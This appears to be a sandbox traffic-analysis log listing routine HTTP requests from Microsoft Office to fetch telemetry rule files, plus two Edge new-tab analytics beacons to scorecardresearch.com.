Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /b?rn=1731414942256&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=18953A12EB3F612E20052F27EA3760E0&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /b2?rn=1731414942256&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=18953A12EB3F612E20052F27EA3760E0&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1A1eec71fa5e7c732a5b6c01731414943; XID=1A1eec71fa5e7c732a5b6c01731414943
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
